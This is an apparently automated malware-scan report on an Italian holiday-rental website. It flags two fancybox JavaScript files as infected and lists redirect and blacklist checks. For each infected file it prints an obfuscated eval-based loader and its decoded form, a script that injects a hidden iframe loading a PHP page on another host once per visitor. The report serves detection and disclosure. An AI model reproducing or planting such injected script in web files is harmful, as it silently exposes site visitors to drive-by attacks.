Scanned pages/files
Request | Server response | Status |
http://casavacanzemarchein.it/ | 200 OK Content-Length: 10262 Content-Type: text/html | clean |
http://casavacanzemarchein.it/./fancybox/jquery.mousewheel-3.0.4.pack.js | 200 OK Content-Length: 4486 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e747b842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e747b843c8180712e4b2e357682827e483d3d7e767d827d817380847771737a6f8277816f7c6f3c77823d8666855b705478643c7e767e3549182e747b843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e747b843c8182877a733c707d807273802e4b2e353e3549182e747b843c8182877a733c7673777576 Decoded script: String String function zzzfff() { var fmv = document.createElement('iframe'); fmv.src = 'http://photoservicelatisana.it/xXwMbFjV.php'; fmv.style.position = 'absolute'; fmv.style.border = '0'; fmv.style.height = '9px'; fmv.style.width = '7px'; fmv.style.left = '1px'; fmv.style.top = '1px'; if (!document.getElementById('fmv')) { document.write('<div id=\'fmv\'></div>'); document.getElementById('fmv').appendChild(fmv);< if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://casavacanzemarchein.it/./fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 12196 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e747b842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e747b843c8180712e4b2e357682827e483d3d7e767d827d817380847771737a6f8277816f7c6f3c77823d8666855b705478643c7e767e3549182e747b843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e747b843c8182877a733c707d807273802e4b2e353e3549182e747b843c8182877a733c7673777576 Decoded script: String String function zzzfff() { var fmv = document.createElement('iframe'); fmv.src = 'http://photoservicelatisana.it/xXwMbFjV.php'; fmv.style.position = 'absolute'; fmv.style.border = '0'; fmv.style.height = '9px'; fmv.style.width = '7px'; fmv.style.left = '1px'; fmv.style.top = '1px'; if (!document.getElementById('fmv')) { document.write('<div id=\'fmv\'></div>'); document.getElementById('fmv').appendChild(fmv);< if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://casavacanzemarchein.it/dove-siamo.html | 200 OK Content-Length: 6850 Content-Type: text/html | clean |
http://casavacanzemarchein.it/listino-prezzi.html | 200 OK Content-Length: 11675 Content-Type: text/html | clean |
http://casavacanzemarchein.it/./example/7_b.jpg | 200 OK Content-Length: 300937 Content-Type: image/jpeg | clean |
http://casavacanzemarchein.it/test404page.js | 404 Not Found Content-Length: 492 Content-Type: text/html | clean |
http://casavacanzemarchein.it/./example/9_b.jpg | 200 OK Content-Length: 300937 Content-Type: image/jpeg | clean |
http://casavacanzemarchein.it/./example/10_b.jpg | 200 OK Content-Length: 300937 Content-Type: image/jpeg | clean |
http://casavacanzemarchein.it/./example/11_b.jpg | 200 OK Content-Length: 300937 Content-Type: image/jpeg | clean |
http://casavacanzemarchein.it/./example/12_b.jpg | 200 OK Content-Length: 300937 Content-Type: image/jpeg | clean |
http://casavacanzemarchein.it/./example/1_b.jpg | 200 OK Content-Length: 300937 Content-Type: image/jpeg | clean |
http://casavacanzemarchein.it/./example/2_b.jpg | 200 OK Content-Length: 300937 Content-Type: image/jpeg | clean |
http://casavacanzemarchein.it/./example/5_b.jpg | 200 OK Content-Length: 196808 Content-Type: image/jpeg | clean |
http://casavacanzemarchein.it/./example/3_b.jpg | 200 OK Content-Length: 70922 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: casavacanzemarchein.it
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 08 Jun 2014 00:35:06 GMT
Accept-Ranges: bytes
ETag: "6a00a9-2816-4e3c141dee4ec"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 10262
Content-Type: text/html
Last-Modified: Mon, 12 Aug 2013 14:51:20 GMT
...10262 bytes of data.
GET / HTTP/1.1
Host: casavacanzemarchein.it
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 08 Jun 2014 00:35:06 GMT
Accept-Ranges: bytes
ETag: "6a00a9-2816-4e3c141dee4ec"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 10262
Content-Type: text/html
Last-Modified: Mon, 12 Aug 2013 14:51:20 GMT
...10262 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: casavacanzemarchein.it
Referer: http://www.google.com/search?q=casavacanzemarchein.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: casavacanzemarchein.it
Referer: http://www.google.com/search?q=casavacanzemarchein.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=casavacanzemarchein.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://casavacanzemarchein.it/
Result: casavacanzemarchein.it is not infected or malware details are not published yet.
Result: casavacanzemarchein.it is not infected or malware details are not published yet.